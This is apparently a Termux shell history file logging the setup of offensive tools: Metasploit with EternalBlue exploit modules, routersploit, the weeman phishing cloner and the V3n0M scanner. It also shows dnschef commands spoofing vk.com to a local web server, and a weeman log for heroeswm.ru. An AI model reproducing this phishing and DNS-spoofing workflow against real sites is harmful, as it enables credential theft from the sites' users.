- cmd: python dnschef -h
  when: 1504293093
- cmd: python2 dnschef -h
  when: 1504293099
- cmd: python2 dnschef
  when: 1504293126
- cmd: python dnschef
  when: 1504293133
- cmd: pkg search python
  when: 1504293140
- cmd: pip2 install dnslib
  when: 1504293193
- cmd: pip2 install IPy
  when: 1504293224
- cmd: python2 dnschef.py -h
  when: 1504293243
  paths:
    - dnschef.py
- cmd: cd Storm/
  when: 1504293392
  paths:
    - Storm/
- cmd: bash start.sh 
  when: 1504293395
  paths:
    - start.sh
- cmd: createdb msfdb
  when: 1504293481
- cmd: createuser msf
  when: 1504293490
- cmd: cp $HOME/Storm/prog/msfstart.sh $HOME/msfconsole/
  when: 1504293557
- cmd: cp $HOME/Storm/prog/msfstop.sh $HOME/msfconsole/
  when: 1504293570
- cmd: chmod 700 msfstart.sh
  when: 1504293745
  paths:
    - msfstart.sh
- cmd: chmod 700 msfstop.sh
  when: 1504293753
  paths:
    - msfstop.sh
- cmd: termux-elf-cleaner /data/data/com.termux/files/usr/lib/ruby/gems/2.4.0/gems/pg-0.20.0/lib/pg_ext.so
  when: 1504294512
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/gems/2.4.0/gems/pg-0.20.0/lib/pg_ext.so
- cmd: cd routersploit/
  when: 1504294705
  paths:
    - routersploit/
- cmd: python rsf.py
  when: 1504294713
  paths:
    - rsf.py
- cmd: python2 rsf.py
  when: 1504294723
  paths:
    - rsf.py
- cmd: gem listgoogleauth
  when: 1504295218
- cmd: ks
  when: 1504295494
- cmd: gem list googleauth
  when: 1504295537
- cmd: gem list google-protobuf
  when: 1504295572
- cmd: gem uninstall google-protobuf
  when: 1504295667
- cmd: gem uninstall googleauth
  when: 1504295684
- cmd: gem list faraday
  when: 1504295743
- cmd: gem list memoist
  when: 1504295794
- cmd: gem list addressable
  when: 1504295840
- cmd: gem uninstall addressable
  when: 1504295882
- cmd: gem uninstall memoist
  when: 1504295900
- cmd: gem uninstall faraday
  when: 1504295919
- cmd: gem list public_suffix
  when: 1504295990
- cmd: nano Gemfile.lock
  when: 1504295998
  paths:
    - Gemfile.lock
- cmd: gem uninstall public_suffix
  when: 1504296063
- cmd: bundle install
  when: 1504296071
- cmd: bash msfstart.sh
  when: 1504296084
  paths:
    - msfstart.sh
- cmd: nano msfconsole
  when: 1504296995
  paths:
    - msfconsole
- cmd: pg_ctl -D $PREFIX/var/lib/postgresql stop
  when: 1504297027
- cmd: d
  when: 1504297612
- cmd: cd Eternalblue-Doublepulsar-Metasploit/
  when: 1504335632
  paths:
    - Eternalblue-Doublepulsar-Metasploit/
- cmd: cp eternalblue_doublepulsar.rb /data/data/com.termux/files/home/msfconsole/modules/exploits/windows/smb/
  when: 1504335689
  paths:
    - eternalblue_doublepulsar.rb
    - /data/data/com.termux/files/home/msfconsole/modules/exploits/windows/smb/
- cmd: cp Eternalblue-Doublepulsar-Metasploit/ $HOME/msfconsole/
  when: 1504335723
  paths:
    - Eternalblue-Doublepulsar-Metasploit/
- cmd: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
  when: 1504335763
- cmd: cp -r Eternalblue-Doublepulsar-Metasploit/ $HOME/msfconsole/
  when: 1504335798
  paths:
    - Eternalblue-Doublepulsar-Metasploit/
- cmd: rm -rf Eternalblue-Doublepulsar-Metasploit/
  when: 1504335802
  paths:
    - Eternalblue-Doublepulsar-Metasploit/
- cmd: mv Eternalblue-Doublepulsar-Metasploit/ edem
  when: 1504335827
  paths:
    - Eternalblue-Doublepulsar-Metasploit/
- cmd: mkdir -p /root/.wine/drive_c/
  when: 1504337911
- cmd: cd $PREFIX
  when: 1504339620
- cmd: pwd
  when: 1504339624
- cmd: git clone https://github.com/Hypsurus/weeman
  when: 1504345489
- cmd: git clone https://github.com/Hypsurus/samyoyo/weeman
  when: 1504345559
- cmd: git clone https://github.com/samyoyo/weeman
  when: 1504345581
- cmd: cd weeman/
  when: 1504345586
  paths:
    - weeman/
- cmd: ls -a
  when: 1504345606
- cmd: chmod a+x weeman.py 
  when: 1504345620
  paths:
    - weeman.py
- cmd: ./weeman.py 
  when: 1504345626
- cmd: ncdu
  when: 1504346043
- cmd: python2 weeman.py 
  when: 1504346063
  paths:
    - weeman.py
- cmd: rm -rf www.heroeswm.ru.log 
  when: 1504346273
  paths:
    - www.heroeswm.ru.log
- cmd: rm -rf www.
  when: 1504346279
- cmd: rm -rf www.*
  when: 1504346288
- cmd: git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner
  when: 1504346355
- cmd: cd V3n0M-Scanner/
  when: 1504346535
  paths:
    - V3n0M-Scanner/
- cmd: mv V3n0M-Scanner/ venomscan
  when: 1504346550
  paths:
    - V3n0M-Scanner/
- cmd: pip install aiohttp asyncio bs4 dnspython tqdm datetime requests socksipy-branch httplib2
  when: 1504346685
- cmd: cd venomscan/
  when: 1504346910
  paths:
    - venomscan/
- cmd: python3 setup.py install --user
  when: 1504346933
  paths:
    - setup.py
- cmd: chmod 777 setup.py 
  when: 1504346953
  paths:
    - setup.py
- cmd: python3 setup.py install -user
  when: 1504346958
  paths:
    - setup.py
- cmd: python3 setup.py install
  when: 1504346963
  paths:
    - setup.py
- cmd: python setup.py install
  when: 1504346982
  paths:
    - setup.py
- cmd: python2 setup.py install
  when: 1504346988
  paths:
    - setup.py
- cmd: python v3n0m.py 
  when: 1504347006
  paths:
    - v3n0m.py
- cmd: l
  when: 1504347210
- cmd: pkg install apache2 apache2-dev
  when: 1504347252
- cmd: pkg install apr apr-util
  when: 1504347292
- cmd: apr
  when: 1504347299
- cmd: apachectl 
  when: 1504347313
- cmd: apachectl --help
  when: 1504347326
- cmd: apachectl -h
  when: 1504349378
- cmd: apachectl -D ServerName start
  when: 1504349436
- cmd: apachectl start -D ServerName
  when: 1504349451
- cmd: pkg install apache2
  when: 1504349948
- cmd: a
  when: 1504350465
- cmd: apachectl fullstatus
  when: 1504350797
- cmd: apachectl status
  when: 1504350803
- cmd: ap
  when: 1504351024
- cmd: exiy
  when: 1504351214
- cmd: netstat -alpn | grep 80
  when: 1504351504
- cmd: netstat -alpn | grep 8081
  when: 1504351513
- cmd: net
  when: 1504351550
- cmd: grep -h
  when: 1504351562
- cmd: ngnix
  when: 1504351610
- cmd: grep 8081
  when: 1504351793
- cmd: netstat -nltp | grep 8081
  when: 1504351934
- cmd: d msfconsole/
  when: 1504360148
  paths:
    - msfconsole/
- cmd: wget https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
  when: 1504364320
- cmd: cp ms17_010_eternalblue.rb $HOME/msfconsole/modules/exploits/windows/smb/
  when: 1504364364
  paths:
    - ms17_010_eternalblue.rb
- cmd: rm -rf ms17_010_eternalblue.rb 
  when: 1504364372
  paths:
    - ms17_010_eternalblue.rb
- cmd: pg_ctl -D $PREFIX/var/lib/postgresql start
  when: 1504365433
- cmd: cd msfconsole/
  when: 1504365436
  paths:
    - msfconsole/
- cmd: ruby msfconsole
  when: 1504365438
  paths:
    - msfconsole
- cmd: proc
  when: 1504368643
- cmd: kill 20933
  when: 1504368661
- cmd: httpd restart
  when: 1504368763
- cmd: httpd stop
  when: 1504368769
- cmd: httpd -k stop
  when: 1504368850
- cmd: tsi
  when: 1504368860
- cmd: apachectl -k stop
  when: 1504368894
- cmd: apachectl restart
  when: 1504368902
- cmd: kill 21821
  when: 1504368927
- cmd: pg_ctl -D $PREFIX/var/lib/postgresql stop
  when: 1504369299
- cmd: tail -h
  when: 1504443478
- cmd: tail --help
  when: 1504443484
- cmd: tail -f /data/data/com.termux/files/usr/share/apache2/default-site/htdocs/file.txt
  when: 1504443655
  paths:
    - /data/data/com.termux/files/usr/share/apache2/default-site/htdocs/file.txt
- cmd: python2 dnschef.py --help
  when: 1504443787
  paths:
    - dnschef.py
- cmd: python2 dnschef.py --fakeip=127.0.0.1
  when: 1504443828
  paths:
    - dnschef.py
- cmd: python2 dnschef.py --fakeip=127.0.0.1 --fakedomain=vk.com
  when: 1504443952
  paths:
    - dnschef.py
- cmd: kill 26479
  when: 1504444239
- cmd: git clone https://github.com/guns/dnsmasq
  when: 1504447680
- cmd: pkg ssrch php
  when: 1504450015
- cmd: pkg install php-apache
  when: 1504450040
- cmd: pkg install php-dev
  when: 1504450183
- cmd: php
  when: 1504450455
- cmd: php-apache
  when: 1504450481
- cmd: php -S 127.0.0.1:8080
  when: 1504450566
- cmd: apachectl stop
  when: 1504451290
- cmd: kill 3300
  when: 1504451299
- cmd: apachectl start
  when: 1504451684
- cmd: kill 4985
  when: 1504451719
- cmd: php -h
  when: 1504452158
- cmd: php -i
  when: 1504452221
- cmd: php -m
  when: 1504452231
- cmd: netstat -nltp | grep 8080
  when: 1504452554
- cmd: netstat
  when: 1504452567
- cmd: netstat -nltp
  when: 1504453286
- cmd: pkg uninstall apache2 php
  when: 1504453298
- cmd: pkg search php
  when: 1504453315
- cmd: pkg uninstall apr apr-util
  when: 1504453354
- cmd: pkg autoremove
  when: 1504453608
- cmd: apt autoremove apache2
  when: 1504453625
- cmd: apt update
  when: 1504453658
- cmd: apt upgrde
  when: 1504453664
- cmd: apt upgrade
  when: 1504453670
- cmd: apt uninstall apache2
  when: 1504453680
- cmd: apt search apache
  when: 1504453687
- cmd: pkg clean
  when: 1504453792
- cmd: pkg autoremove apache2
  when: 1504453798
- cmd: pkg -h
  when: 1504453807
- cmd: pkg uninstall apache2
  when: 1504453821
- cmd: rm -rf /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease 
  when: 1504453942
- cmd: pkg update
  when: 1504453947
- cmd: pkg search dnsmasq
  when: 1504454205
- cmd: pkg search apache
  when: 1504454214
- cmd: python2 dnschef.py --fakeip=127.0.0.1:8080
  when: 1504454742
  paths:
    - dnschef.py
- cmd: pip search genpac
  when: 1504454831
- cmd: pip install genpac
  when: 1504454847
- cmd: genpac -h
  when: 1504454871
- cmd: pip ConfigParser
  when: 1504454895
- cmd: pip uninstall genpac
  when: 1504454917
- cmd: python2 dnschef.py -i 127.0.0.1:8080
  when: 1504455305
  paths:
    - dnschef.py
- cmd: python2 dnschef.py -i 127.0.0.1 -p 8080
  when: 1504455340
  paths:
    - dnschef.py
- cmd: python2 dnschef.py
  when: 1504456548
  paths:
    - dnschef.py
- cmd: cd dnschef/
  when: 1504456797
  paths:
    - dnschef/
- cmd: tsu
  when: 1504456799
- cmd: nano dnschef.ini 
  when: 1504457047
  paths:
    - dnschef.ini
- cmd: python2 dnschef.py -i 127.0.0.1
  when: 1504457117
  paths:
    - dnschef.py
- cmd: exit
  when: 1504457319
- cmd: wget http://www.thekelleys.org.uk/dnsmasq/dnsmasq-2.70.tar.gz
  when: 1504457484
- cmd: tar -xvzf dnsmasq-2.70.tar.gz
  when: 1504457521
  paths:
    - dnsmasq-2.70.tar.gz
- cmd: rm -rf dnsmasq-2.70.tar.gz 
  when: 1504457532
  paths:
    - dnsmasq-2.70.tar.gz
- cmd: mv dnsmasq-2.70/ dnsmasq
  when: 1504457542
  paths:
    - dnsmasq-2.70/
- cmd: chmod 700 Makefile 
  when: 1504457559
  paths:
    - Makefile
- cmd: make
  when: 1504457562
- cmd: cd src/
  when: 1504457639
  paths:
    - src/
- cmd: cd ..
  when: 1504457675
  paths:
    - ..
- cmd: termux-chroot
  when: 1504457687
- cmd: ls -al
  when: 1504457838
- cmd: rm -rf dnsmasq/
  when: 1504457852
  paths:
    - dnsmasq/
- cmd: rm -rf .wget-hsts 
  when: 1504457859
  paths:
    - .wget-hsts
- cmd: git clone https://github.com/hw-cookbooks/hosts-file
  when: 1504457983
- cmd: git clone https://github.com/hw-cookbooks/hosts_file
  when: 1504458006
- cmd: cd hosts_file/
  when: 1504458017
  paths:
    - hosts_file/
- cmd: ls
  when: 1504458018
- cmd: cd
  when: 1504458035
- cmd: rm -rf hosts_file/
  when: 1504458038
  paths:
    - hosts_file/
- cmd: git clone https://github.com/hw-cookbooks/dnsmasq
  when: 1504458049
- cmd: cd dnsmasq/
  when: 1504458055
  paths:
    - dnsmasq/
- cmd: ls
  when: 1504458056
- cmd: gem install bundler
  when: 1504458072
- cmd: bundle install
  when: 1504458087
- cmd: ls
  when: 1504458264
- cmd: cd
  when: 1504458270
- cmd: rm -rf dnsmasq/
  when: 1504458274
  paths:
    - dnsmasq/
- cmd: ls
  when: 1504458276
- cmd: cd dnschef/
  when: 1504458281
  paths:
    - dnschef/
- cmd: tsu
  when: 1504458283
- cmd: python2 dnschef.py -h
  when: 1504458292
  paths:
    - dnschef.py
- cmd: python2 dnschef.py --fakeip 127.0.0.1 --fakedomains .*.vk.com
  when: 1504458704
  paths:
    - dnschef.py
- cmd: bash
  when: 1504458807
- cmd: python2 dnschef.py --fakeip 127.0.0.1 --fakedomains .*.vk.com
  when: 1504459231
  paths:
    - dnschef.py
- cmd: python2 dnschef.py --fakeip 127.0.0.1 --fakedomains ( --inclide=".*.vk.com" )
  when: 1504459326
  paths:
    - dnschef.py
- cmd: python2 dnschef.py --fakeip 127.0.0.1 --fakedomains .*.vk.com
  when: 1504459506
  paths:
    - dnschef.py
- cmd: exit
  when: 1504459509
- cmd: nano dnschef.ini 
  when: 1504459513
  paths:
    - dnschef.ini
- cmd: python2 dnschef.py --file dnschef.ini -q
  when: 1504459600
  paths:
    - dnschef.py
    - dnschef.ini
- cmd: tsu
  when: 1504459603
- cmd: python2 dnschef.py --file dnschef.ini -q
  when: 1504459606
  paths:
    - dnschef.py
    - dnschef.ini
- cmd: ifconfig
  when: 1504459822
- cmd: exit
  when: 1504459829
- cmd: python2 dnschef.py --file dnschef.ini
  when: 1504459612
  paths:
    - dnschef.py
    - dnschef.ini
- cmd: python2 dnschef.py
  when: 1504460193
  paths:
    - dnschef.py
- cmd: exit
  when: 1504460305
- cmd: exit
  when: 1504460308
- cmd: tsu
  when: 1504500527
- cmd: cd dnschef/
  when: 1504500532
  paths:
    - dnschef/
- cmd: bash
  when: 1504500598
- cmd: exit
  when: 1504500887
- cmd: exit
  when: 1504500891
